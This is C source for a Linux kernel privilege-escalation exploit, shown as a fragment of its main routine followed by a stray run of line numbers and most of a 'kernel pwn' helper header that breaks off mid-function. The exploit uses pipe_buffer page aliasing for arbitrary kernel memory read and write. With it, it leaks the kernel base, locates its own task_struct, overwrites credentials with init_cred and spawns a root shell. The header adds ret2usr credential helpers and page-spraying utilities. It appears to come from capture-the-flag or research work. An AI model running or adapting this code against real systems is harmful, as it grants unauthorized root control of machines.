            printf("[x] failed to extend %d pipe!\n", i);
            return -1;
        }
    }

    /* tag every pipe's page with its own index so aliasing can be detected */
    for (int i = 0; i < PIPE_NUM; i++){
        write(pipe_list[i][1], "AAAAAAAA", 8); // tag
        write(pipe_list[i][1], &i, sizeof(int));
        write(pipe_list[i][1], &i, sizeof(int));
        write(pipe_list[i][1], &i, sizeof(int));
        write(pipe_list[i][1], "AAAAAAAA", 8);
        write(pipe_list[i][1], "BBBBBBBB", 8);
    }

    memset(buf, 0, sizeof(buf));
    for (int i = 0; i < 0x10; i++) {
        kwrite(i, 0x2048 - 8, buf);
    }

    /* a pipe whose page carries another pipe's index shares that pipe's page */
    int victim_idx = -1;
    int orig_idx = -1;
    for (int i = 0; i < PIPE_NUM; i++){
        char tag[0x10];
        int nr = i; /* stays "no hit" if the read below fails */
        memset(tag, 0, sizeof(tag));
        read(pipe_list[i][0], tag, 8);
        read(pipe_list[i][0], &nr, sizeof(int));
        if (!strcmp(tag, "AAAAAAAA") && nr != i && nr >= 0 && nr < PIPE_NUM){
            orig_idx = nr;
            victim_idx = i;
            printf("\033[32m\033[1m[+] Found index-%d and index-%d point the same page \033[0m\n",victim_idx, orig_idx);
        }
    }
    if (orig_idx == -1 || victim_idx == -1){
        err_exit("can't find");
    }

    struct pipe_buffer info_pipe_buf;
    size_t snd_pipe_sz = 0x1000 * (SND_PIPE_BUF_SZ / sizeof(struct pipe_buffer));

    memset(buf,'p',sizeof(buf));
    write(pipe_list[victim_idx][1], buf, SND_PIPE_BUF_SZ * 2 - 24 - 3 * sizeof(int));
    close(pipe_list[orig_idx][0]); /* release one of the two pipes that share the page */
    close(pipe_list[orig_idx][1]);

    puts("write down");

    for (int i = 0; i < PIPE_NUM; i++){
        if (i == orig_idx || i == victim_idx){
            continue;
        }
        if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, snd_pipe_sz) < 0){
            /* 2 * pipe_buffer = 0x60 kmalloc-96 */
            err_exit("Fcntl Pipe");
        }
    }

    /* read back through the surviving pipe and capture one pipe_buffer */
    memset(buf,0,sizeof(buf));
    read(pipe_list[victim_idx][0], buf, SND_PIPE_BUF_SZ - 8 - sizeof(int));
    print_hex(buf,SND_PIPE_BUF_SZ - 8);
    read(pipe_list[victim_idx][0], &info_pipe_buf, sizeof(info_pipe_buf));
    print_hex((char*)&info_pipe_buf,sizeof(info_pipe_buf));

    printf("\033[34m\033[1m[?] info_pipe_buf->page: \033[0m%p\n"
           "\033[34m\033[1m[?] info_pipe_buf->ops: \033[0m%p\n",
           info_pipe_buf.page, info_pipe_buf.ops);

    /* advance the captured page pointer by one 0x40-byte descriptor and write it back */
    info_pipe_buf.page = (struct page *)((size_t)info_pipe_buf.page + 0x40);
    write(pipe_list[victim_idx][1], &info_pipe_buf, sizeof(info_pipe_buf));
    puts("change pipe_buffer down");

    int snd_orig_idx = -1;
    int snd_victim_idx = -1;
    for (int i = 0; i < PIPE_NUM; i++){ /* second heap spray */
        int nr = i; /* stays "no hit" if the read below fails */
        if (i == orig_idx || i == victim_idx){
            continue;
        }
        read(pipe_list[i][0], &nr, sizeof(int));
        if (i != nr && nr >= 0 && nr < PIPE_NUM){
            snd_orig_idx = nr;
            snd_victim_idx = i;
            printf("\033[32m\033[1m[+] Found index-%d and index-%d point the same page \033[0m\n",snd_victim_idx, snd_orig_idx);
        }
    }

    if (snd_orig_idx == -1 || snd_victim_idx == -1){
        err_exit("can't find");
    }

    size_t trd_pipe_sz = 0x1000 * (TRD_PIPE_BUF_SZ / sizeof(struct pipe_buffer));
    struct pipe_buffer evil_pipe_buf;
    struct page *page_ptr = NULL;

    memset(buf,'k',sizeof(buf));
    write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - 24 - 3 * sizeof(int));
    close(pipe_list[snd_orig_idx][0]);
    close(pipe_list[snd_orig_idx][1]);

    puts("write down");

    for (int i = 0; i < PIPE_NUM; i++){
        if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx){
            continue;
        }

        if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, trd_pipe_sz) < 0){
            /* 4 * pipe_buffer = 0xc0 kmalloc-192 */
            err_exit("Fcntl Pipe");
        }
    }

    puts("fcntl down");

    evil_pipe_buf.page = info_pipe_buf.page;
    evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
    evil_pipe_buf.len = TRD_PIPE_BUF_SZ;
    evil_pipe_buf.ops = info_pipe_buf.ops;
    evil_pipe_buf.flags = info_pipe_buf.flags;
    evil_pipe_buf.private = info_pipe_buf.private;

    write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));
    puts("change pipe_buffer down");

    /* first self-writing pipe: the one that reads back our own page pointer */
    for (int i = 0; i < PIPE_NUM; i++){
        if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx){
            continue;
        }

        page_ptr = NULL;
        read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
        printf("%p\n",page_ptr);
        if (page_ptr == evil_pipe_buf.page){
            self_2nd_pipe_idx = i;
            printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m%d\n",
                   self_2nd_pipe_idx);
            break;
        }
    }
    if (self_2nd_pipe_idx == -1){
        err_exit("can't find the 2nd self-writing pipe");
    }

    evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
    evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

    memset(buf,'n',sizeof(buf));
    write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));
    write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

    puts("change pipe_buffer down");

    /* second self-writing pipe */
    for (int i = 0; i < PIPE_NUM; i++){
        if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx || i == self_2nd_pipe_idx){
            continue;
        }

        page_ptr = NULL;
        read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
        printf("%p\n",page_ptr);
        if (page_ptr == evil_pipe_buf.page){
            self_3rd_pipe_idx = i;
            printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m"
                   "%d\n",
                   self_3rd_pipe_idx);
            break;
        }
    }
    if (self_3rd_pipe_idx == -1){
        err_exit("can't find the 3rd self-writing pipe");
    }

    evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
    evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

    memset(buf,'m',sizeof(buf));
    write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));
    write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

    puts("change pipe_buffer down");

    /* third self-writing pipe */
    for (int i = 0; i < PIPE_NUM; i++){
        if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx || i == self_2nd_pipe_idx || i == self_3rd_pipe_idx){
            continue;
        }

        page_ptr = NULL;
        read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
        printf("%p\n",page_ptr);
        if (page_ptr == evil_pipe_buf.page){
            self_4th_pipe_idx = i;
            printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m"
                   "%d\n",
                   self_4th_pipe_idx);
            break;
        }
    }
    if (self_4th_pipe_idx == -1){
        err_exit("can't find the 4th self-writing pipe");
    }

    /* templates used by arbitrary_read_by_pipe()/arbitrary_write_by_pipe() */
    memcpy(&evil_2nd_buf, &info_pipe_buf, sizeof(evil_2nd_buf));
    memcpy(&evil_3rd_buf, &info_pipe_buf, sizeof(evil_3rd_buf));
    memcpy(&evil_4th_buf, &info_pipe_buf, sizeof(evil_4th_buf));

    evil_2nd_buf.offset = 0;
    evil_2nd_buf.len = 0xff0;

    evil_3rd_buf.offset = TRD_PIPE_BUF_SZ * 3;
    evil_3rd_buf.len = 0;

    write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));
    puts("change pipe_buffer down");

    evil_4th_buf.offset = TRD_PIPE_BUF_SZ;
    evil_4th_buf.len = 0;

    /*
     * Walk candidate vmemmap bases downwards in 0x10000000 steps. A candidate
     * is accepted when the first 8 bytes of the page behind descriptor 157
     * hold a value above 0xffffffff81000000 whose low 12 bits are 0x070.
     */
    vmemmap_base = (size_t)info_pipe_buf.page & 0xfffffffff0000000;
    printf("vmemmap_start: 0x%lx\n",vmemmap_base);
    for (;;)
    {
        uint64_t leak;

        arbitrary_read_by_pipe((struct page *)(vmemmap_base + 157 * 0x40), buf);
        memcpy(&leak, buf, sizeof(leak)); /* avoid reading char storage through a uint64_t lvalue */
        if (leak > 0xffffffff81000000 && ((leak & 0xfff) == 0x070))
        {
            kernel_base = leak - 0x070;
            kernel_offset = kernel_base - 0xffffffff81000000;
            printf("\033[32m\033[1m[+] Found kernel base: \033[0m0x%lx\n"
                   "\033[32m\033[1m[+] Kernel offset: \033[0m0x%lx\n",
                   kernel_base, kernel_offset);
            break;
        }

        vmemmap_base -= 0x10000000;
    }
    printf("\033[32m\033[1m[+] vmemmap_base:\033[0m 0x%lx\n\n", vmemmap_base);

    uint64_t parent_task, current_task;
    puts("[*] Seeking task_struct in memory...");

    uint64_t *comm_addr = 0;
    uint64_t *point_buf = malloc(0x1000);
    if (point_buf == NULL){
        err_exit("malloc");
    }

    /* give this task a recognisable name and scan physical pages for it */
    char target[0x20];
    strcpy(target, "8888888888");
    if (prctl(PR_SET_NAME, target, 0, 0, 0) != 0){
        err_exit("cannot set name");
    }

    for (int i = 0; 1; i++)
    {
        arbitrary_read_by_pipe((struct page *)(vmemmap_base + i * 0x40), point_buf);

        comm_addr = memmem(point_buf, 0xf00, target, strlen(target));
        /* the checks below index up to 57 words before the match; stay inside point_buf */
        if (comm_addr && ((char *)comm_addr - (char *)point_buf >= 57 * 8)
            && (comm_addr[-2] > 0xffff888000000000) /* task->cred */
            && (comm_addr[-3] > 0xffff888000000000) /* task->real_cred */
            && (comm_addr[-57] > 0xffff888000000000) /* task->real_parent */
            && (comm_addr[-56] > 0xffff888000000000)) /* task->parent */
        {
            parent_task = comm_addr[-57];

            /* NOTE(review): presumably a self-referencing pointer 2528 bytes into the task_struct; confirm for the target kernel */
            current_task = comm_addr[-50] - 2528;
            page_offset_base = (comm_addr[-50] & 0xfffffffffffff000) - i * 0x1000;
            page_offset_base &= 0xfffffffff0000000;

            printf("\033[32m\033[1m[+] Found task_struct on page: \033[0m%p\n",
                   (struct page *)(vmemmap_base + i * 0x40));
            printf("\033[32m\033[1m[+] page_offset_base: \033[0m0x%lx\n",
                   page_offset_base);
            printf("\033[34m\033[1m[*] current task_struct's addr: \033[0m0x%lx\n",
                   current_task);
            printf("\033[34m\033[1m[*] parent task_struct's addr: \033[0m0x%lx\n\n",
                   parent_task);
            break;
        }
    }

    puts("[*] Seeking for init_task...");
    uint64_t *tsk_buf;
    /* while debugging, init can be reached by following task_struct->parent (offset=309*8) upwards */
    uint64_t init_task = kernel_offset + 0xffffffff8301bb80;
    uint64_t init_cred = kernel_offset + 0xffffffff83079ee8; // task->cred(offset=363*8)
    uint64_t init_nsproxy = kernel_offset + 0xffffffff83079b40; // task->nsproxy (offset=377*8)

    printf("\033[32m\033[1m[+] Found init_task: \033[0m0x%lx\n", init_task);
    printf("\033[32m\033[1m[+] Found init_cred: \033[0m0x%lx\n", init_cred);
    printf("\033[32m\033[1m[+] Found init_nsproxy:\033[0m0x%lx\n", init_nsproxy);

    puts("[*] Escalating ROOT privilege now...");

    size_t current_task_page = direct_map_addr_to_page_addr(current_task);

    /* fetch the page holding the task_struct and the page after it */
    arbitrary_read_by_pipe((struct page *)current_task_page, buf);
    arbitrary_read_by_pipe((struct page *)(current_task_page + 0x40), buf + 0x1000);

    tsk_buf = (uint64_t *)((size_t)buf + (current_task & 0xfff));
    tsk_buf[363] = init_cred;
    tsk_buf[364] = init_cred;
    tsk_buf[377] = init_nsproxy;

    arbitrary_write_by_pipe((struct page *)current_task_page, buf, 0xff0);
    arbitrary_write_by_pipe((struct page *)(current_task_page + 0x40), buf + 0x1000, 0xff0);

    puts("[+] Done.\n");
    puts("[*] checking for root...");

    get_root_shell();

    return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
1050
1051
1052
1053
1054
1055
1056
1057
1058
1059
1060
1061
1062
1063
1064
1065
1066
1067
1068
1069
1070
1071
1072
1073
1074
1075
1076
1077
1078
1079
1080
1081
1082
1083
1084
1085
1086
1087
1088
1089
1090
1091
1092
1093
1094
1095
1096
1097
1098
1099
1100
1101
1102
1103
1104
1105
1106
1107
1108
1109
1110
/**
* @file kernel.h
* @author arttnba3 (arttnba@gmail.com)
* @brief arttnba3's personal utils for kernel pwn
* @version 1.1
* @date 2023-05-20
*
* @copyright Copyright (c) 2023 arttnba3
*
*/
#ifndef A3_KERNEL_PWN_H
#define A3_KERNEL_PWN_H

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <sys/types.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/wait.h>
#include <semaphore.h>
#include <poll.h>
#include <sched.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <arpa/inet.h>
#include <net/if.h>

/**
* I - fundamental functions
* e.g. CPU-core binder, user-status saver, etc.
*/

/*
 * Kernel layout values shared by the helpers in this header. The initializers
 * are starting values only; callers overwrite them once the real addresses
 * are known.
 */
uint64_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
uint64_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;
/* Left zero-initialized here; to be filled in by the user of this header. */
uint64_t init_task, init_nsproxy, init_cred;

/*
 * Convert an address inside the kernel direct mapping into the address of the
 * page descriptor for the page that contains it.
 *
 * Uses the globals page_offset_base and vmemmap_base. Pages are 0x1000 bytes
 * and descriptors are laid out with a 0x40-byte stride.
 */
size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
    /* start of the page that contains the address */
    size_t page_start = direct_map_addr & (~0xfff);
    /* index of that page counted from the start of the direct mapping */
    size_t page_index = (page_start - page_offset_base) >> 12;

    return vmemmap_base + (page_index << 6);
}

/**
 * Dump a buffer to stdout, one pointer-sized row per line: the row offset,
 * eight bytes in hex, then the same bytes as one native-endian word.
 *
 * @param p    buffer to dump
 * @param size number of bytes to dump; must be a multiple of sizeof(void *)
 * @return 0 on success, 1 if p is NULL or size is not a multiple of
 *         sizeof(void *) (nothing is printed in that case)
 *
 * Each row prints exactly eight bytes, so this assumes 8-byte pointers.
 */
int print_hex(void *p, int size){
    const unsigned char *bytes = (const unsigned char *)p;

    if (bytes == NULL || size % sizeof(void *))
    {
        return 1;
    }

    printf("--------------------------------------------------------------------------------\n");
    for (int i = 0; i < size; i += sizeof(void *)){
        unsigned long word;

        /* copy instead of casting: the buffer need not be aligned for a word access */
        memcpy(&word, &bytes[i], sizeof(word));
        printf("0x%04x : %02X %02X %02X %02X %02X %02X %02X %02X 0x%lx\n",
               i, bytes[i+0], bytes[i+1], bytes[i+2], bytes[i+3],
               bytes[i+4], bytes[i+5], bytes[i+6], bytes[i+7], word);
    }
    return 0;
}

/* Report a fatal error, wait five seconds so the message can be read, then exit with failure. */
void err_exit(char *msg)
{
    fprintf(stdout, "\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);

    sleep(5);
    exit(EXIT_FAILURE);
}

/*
 * Check whether the process runs as uid 0. If so, run /bin/sh and exit with
 * success once the shell ends; otherwise report the failure, wait five
 * seconds and exit with failure. Never returns.
 */
void get_root_shell(void)
{
    puts("[*] Checking for root...");

    if (getuid() == 0) {
        puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
        puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

        system("/bin/sh");

        /* leave through exit() rather than returning to the caller */
        exit(EXIT_SUCCESS);
    }

    puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
    sleep(5);
    exit(EXIT_FAILURE);
}

/*
 * Userspace status saver.
 *
 * save_status() copies the current cs, ss, rsp and rflags values into the
 * globals below and prints a confirmation line.
 *
 * NOTE(review): the asm is written destination-first with bare register
 * names, so it presumably has to be assembled in Intel syntax (for example
 * with -masm=intel); confirm against the build command.
 */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
asm volatile (
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
/* rflags cannot be moved directly: push it and pop it into the variable */
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

/*
 * Pin the calling process to a single CPU core.
 *
 * @param core index of the core to run on
 *
 * Prints a confirmation on success. If sched_setaffinity() fails, the error
 * is reported and the affinity is left unchanged instead of claiming success.
 */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) < 0) {
        perror("[x] sched_setaffinity");
        return;
    }

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

/*
 * For ret2usr: treat the two arguments as the addresses of
 * prepare_kernel_cred and commit_creds, call the first with NULL and pass
 * its result to the second.
 */
void get_root_privilige(size_t prepare_kernel_cred, size_t commit_creds)
{
    typedef void *(*prepare_kernel_cred_fn)(void *);
    typedef int (*commit_creds_fn)(void *);

    prepare_kernel_cred_fn make_cred = (prepare_kernel_cred_fn) prepare_kernel_cred;
    commit_creds_fn apply_cred = (commit_creds_fn) commit_creds;
    void *new_cred = make_cred(NULL);

    apply_cred(new_cred);
}

/* Write a string to a /proc control file, reporting (not aborting on) failure. */
static void unshare_write_file(const char *path, const char *data)
{
    int proc_fd = open(path, O_WRONLY);

    if (proc_fd < 0) {
        perror(path);
        return;
    }
    if (write(proc_fd, data, strlen(data)) < 0) {
        perror(path);
    }
    close(proc_fd);
}

/**
 * @brief create an isolated namespace
 * Moves the caller into new mount, user and network namespaces and maps
 * uid/gid 0 inside them to the caller's original uid/gid.
 * note that the caller **SHOULD NOT** be used to get the root, but only as an
 * operator that performs the basic exploiting operations inside it
 *
 * Failures are reported on stderr; the function itself never aborts.
 */
void unshare_setup(void)
{
    char edit[0x100];
    /*
     * Sample the IDs before unshare(): inside a fresh user namespace with no
     * mapping, getuid()/getgid() return the overflow ID, and a map line built
     * from that value is rejected by the kernel.
     */
    uid_t outer_uid = getuid();
    gid_t outer_gid = getgid();

    if (unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET) < 0) {
        perror("[x] unshare");
        return;
    }

    /* setgroups must be denied before an unprivileged process may write gid_map */
    unshare_write_file("/proc/self/setgroups", "deny");

    snprintf(edit, sizeof(edit), "0 %d 1", (int)outer_uid);
    unshare_write_file("/proc/self/uid_map", edit);

    snprintf(edit, sizeof(edit), "0 %d 1", (int)outer_gid);
    unshare_write_file("/proc/self/gid_map", edit);
}

/**
* II - fundamental kernel structures
* e.g. list_head
*/
/* Userspace copy of a doubly-linked list node; both links are stored as raw 64-bit values. */
struct list_head {
uint64_t next;
uint64_t prev;
};

/**
 * III - pgv pages sprayer related
 * note that we should create two processes:
 * - the parent is the one that sends commands and gets root
 * - the child creates an isolated namespace by calling unshare_setup(),
 *   receives commands from the parent and only executes them
 */
/* capacity of the socket table kept by spray_cmd_handler() */
#define PGV_PAGE_NUM 1000
/* option names passed to setsockopt(SOL_PACKET, ...) */
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

/*
 * One command sent from parent to child.
 * Each allocation is (size * nr) bytes, aligned to PAGE_SIZE.
 */
struct pgv_page_request {
int idx;
int cmd;
unsigned int size;
unsigned int nr;
};

/* operation types carried in pgv_page_request.cmd */
enum {
CMD_ALLOC_PAGE,
CMD_FREE_PAGE,
CMD_EXIT,
};

/* pipes for command communication: requests go parent -> child, replies child -> parent */
int cmd_pipe_req[2], cmd_pipe_reply[2];

/*
 * Create an AF_PACKET socket, select TPACKET_V1 and configure a TX ring of
 * `nr` blocks of `size` bytes each (frame size 0x1000).
 *
 * Returns the socket fd on success. On failure a message is printed, the
 * socket (if any) is closed and the negative result of the failing call is
 * returned.
 */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
    struct tpacket_req ring_req;
    int tpacket_version = TPACKET_V1;
    int sock;
    int rc;

    sock = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (sock < 0) {
        printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
        return sock;
    }

    rc = setsockopt(sock, SOL_PACKET, PACKET_VERSION,
                    &tpacket_version, sizeof(tpacket_version));
    if (rc < 0) {
        printf("[x] failed at setsockopt(PACKET_VERSION)\n");
        close(sock);
        return rc;
    }

    /* ring geometry: nr blocks of `size` bytes, split into 0x1000-byte frames */
    memset(&ring_req, 0, sizeof(ring_req));
    ring_req.tp_frame_size = 0x1000;
    ring_req.tp_block_size = size;
    ring_req.tp_block_nr = nr;
    ring_req.tp_frame_nr = (ring_req.tp_block_size * ring_req.tp_block_nr)
                           / ring_req.tp_frame_size;

    rc = setsockopt(sock, SOL_PACKET, PACKET_TX_RING, &ring_req, sizeof(ring_req));
    if (rc < 0) {
        printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
        close(sock);
        return rc;
    }

    return sock;
}

/**
 * Create an AF_PACKET socket with a TPACKET_V3 RX ring and bind it to "lo".
 *
 * @param block_size  size of each ring block in bytes
 * @param frame_size  size of each frame in bytes
 * @param block_nr    number of blocks in the ring
 * @param sizeof_priv value for tp_sizeof_priv
 * @param timeout     value for tp_retire_blk_tov
 * @return the bound socket fd; any failure is reported with perror() and the
 *         process exits with status 1
 *
 * htons() and if_nametoindex() are declared in <arpa/inet.h> and <net/if.h>.
 */
int packet_socket_setup(uint32_t block_size, uint32_t frame_size,
                        uint32_t block_nr, uint32_t sizeof_priv, int timeout) {
    int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (s < 0)
    {
        perror("[-] socket (AF_PACKET)");
        exit(1);
    }

    int v = TPACKET_V3;
    int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
    if (rv < 0)
    {
        perror("[-] setsockopt (PACKET_VERSION)");
        exit(1);
    }

    struct tpacket_req3 req3;
    memset(&req3, 0, sizeof(req3));
    req3.tp_sizeof_priv = sizeof_priv;
    req3.tp_block_nr = block_nr;
    req3.tp_block_size = block_size;
    req3.tp_frame_size = frame_size;
    req3.tp_frame_nr = (block_size * block_nr) / frame_size;
    req3.tp_retire_blk_tov = timeout;
    req3.tp_feature_req_word = 0;

    rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
    if (rv < 0)
    {
        perror("[-] setsockopt (PACKET_RX_RING)");
        exit(1);
    }

    /* every field that is not set explicitly stays zero from the memset */
    struct sockaddr_ll sa;
    memset(&sa, 0, sizeof(sa));
    sa.sll_family = PF_PACKET;
    sa.sll_protocol = htons(ETH_P_ALL);
    sa.sll_ifindex = if_nametoindex("lo");
    sa.sll_hatype = 0;
    sa.sll_pkttype = 0;
    sa.sll_halen = 0;

    rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
    if (rv < 0)
    {
        perror("[-] bind (AF_PACKET)");
        exit(1);
    }

    return s;
}

/*
 * Called by the parent: ask the child to allocate pages.
 *
 * Sends a CMD_ALLOC_PAGE request for slot `idx` (nr blocks of `size` bytes)
 * over cmd_pipe_req and waits for the reply on cmd_pipe_reply.
 *
 * Returns the value reported by the child, or -1 if the request could not be
 * sent or the reply could not be read in full.
 */
int alloc_page(int idx, unsigned int size, unsigned int nr)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = CMD_ALLOC_PAGE,
        .size = size,
        .nr = nr,
    };
    int ret = -1;

    if (write(cmd_pipe_req[1], &req, sizeof(req)) != (ssize_t)sizeof(req)) {
        return -1;
    }
    /* a short or failed read would otherwise leave ret unset */
    if (read(cmd_pipe_reply[0], &ret, sizeof(ret)) != (ssize_t)sizeof(ret)) {
        return -1;
    }

    return ret;
}

/*
 * Called by the parent: ask the child to free the pages held in slot `idx`.
 *
 * Sends a CMD_FREE_PAGE request over cmd_pipe_req and waits for the reply on
 * cmd_pipe_reply.
 *
 * Returns the value reported by the child, or -1 if the request could not be
 * sent or the reply could not be read in full.
 */
int free_page(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = CMD_FREE_PAGE,
    };
    int ret = -1;

    if (write(cmd_pipe_req[1], &req, sizeof(req)) != (ssize_t)sizeof(req)) {
        return -1;
    }
    /* a short or failed read would otherwise leave ret unset */
    if (read(cmd_pipe_reply[0], &ret, sizeof(ret)) != (ssize_t)sizeof(ret)) {
        return -1;
    }

    return ret;
}

/*
 * Runs in the child: serve page-spray commands received over cmd_pipe_req.
 *
 * For every request exactly one int reply is written to cmd_pipe_reply:
 *   - CMD_ALLOC_PAGE: the result of create_socket_and_alloc_pages()
 *   - CMD_FREE_PAGE:  the result of close() on the slot's socket
 *   - CMD_EXIT:       0, after which the function returns
 *   - anything else, or an out-of-range idx: -1
 * The function also returns when a request can no longer be read in full.
 */
void spray_cmd_handler(void)
{
    struct pgv_page_request req;
